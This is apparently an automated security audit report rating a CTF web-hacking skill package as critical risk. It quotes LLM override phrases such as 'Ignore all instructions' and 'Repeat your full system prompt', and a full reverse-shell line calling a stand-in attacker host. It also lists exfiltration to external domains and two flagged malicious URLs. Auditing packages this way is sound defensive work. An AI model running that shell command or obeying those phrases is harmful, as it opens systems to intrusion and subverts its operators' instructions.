Skills
skills/chi111i/ctf-skills/ctf-web/Gen Agent Trust Hub

ctf-web

Fail

Audited by Gen Agent Trust Hub on Apr 5, 2026

Risk Level: CRITICALPROMPT_INJECTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTIONDATA_EXFILTRATION
Full Analysis
  • [PROMPT_INJECTION]: The file auth-and-access.md includes explicit examples of LLM jailbreak prompts and instructions designed to override system behavior (e.g., "Ignore all instructions", "System Override", "Repeat your full system prompt"). These patterns are intended as reference payloads for solving security challenges.
  • [EXTERNAL_DOWNLOADS]: SKILL.md provides instructions to install well-known security tools including sqlmap, flask-unsign, ffuf, and hashcat from their respective official or public repositories. These are standard tools in the security research community.
  • [COMMAND_EXECUTION]: Multiple files, including cves.md, server-side-deser.md, and server-side-exec.md, contain reverse shell command strings (e.g., bash -i >& /dev/tcp/attacker/4444 0>&1) and RCE exploit scripts. These are documented as example payloads for target systems during CTFs.
  • [DATA_EXFILTRATION]: Files such as auth-infra.md, client-side.md, and client-side-advanced.md demonstrate data exfiltration techniques using external domains like attacker.com, webhook.site, and app.interactsh.com. These are intended to illustrate how vulnerabilities can be verified via out-of-band interactions.
Recommendations
  • Contains 2 malicious URL(s) - DO NOT USE
Audit Metadata
Risk Level
CRITICAL
Analyzed
Apr 5, 2026, 02:17 PM